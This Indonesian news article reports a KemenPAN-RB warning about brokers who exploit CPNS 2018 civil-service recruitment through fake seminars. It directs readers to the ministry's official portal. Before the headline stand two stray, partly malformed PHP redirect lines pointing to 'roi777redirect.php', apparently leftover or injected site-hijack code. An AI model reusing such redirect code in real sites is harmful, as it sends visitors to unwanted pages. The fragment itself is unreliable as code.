header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Rekrutmen CPNS 2018, KemenPAN-RB: Hati-hati -
Rekrutmen CPNS 2018, KemenPAN-RB: Hati-hati

TRANSLAMPUNG.COM, JAKARTA – Banyak cara digunakan calo CPNS untuk mencari mangsa. Salah satunya lewat seminar nasional pengadaan CPNS 2018 yang informasinya beredar melalui media sosial.

Mengantisipasi agar tidak ada masyarakat yang tertipu, lagi-lagi Kementerian Pendayagunaan Aparatur Negara dan Reformasi Birokrasi (KemenPAN-RB) mewanti-wanti masyarakat agar berhati-hati.

“KemenPAN-RB tidak pernah bekerja sama dengan pihak mana pun untuk menyelenggarakan seminar nasional mengenai pengadaan CPNS 2018 sebagaimana klaim dalam acara tersebut,” ungkap Herman Suryatman, Kepala Biro Hukum, Komunikasi dan Informasi Publik KemenPAN-RB di Jakarta, Minggu (1/7).

Herman mengingatkan agar masyarakat waspada atas inisiatif pihak yang tidak bertanggung jawab tersebut. Seolah-olah bisa menghadirkan narasumber pejabat dari KemenPAN-RB dalam penyelenggaraaan seminar, pelatihan, bimbingan belajar, atau kegiatan sejenis lainnya.

Dia menjelaskan, semua informasi terkait perkembangan pengadaan CPNS akan disampaikan melalui portal resmi KemenPAN-RB.

“Pemerintah memang berencana melaksanakan pengadaan CPNS 2018, tapi saat ini masih dalam tahap validasi data formasi. Jadi mohon tunggu pengumuman resmi dari kami. Semua informasi terkait perkembangan CPNS, akan kami sampaikan melalui portal resmi,” pungkas Herman. (esy/jpnn/jpg)

News Reporter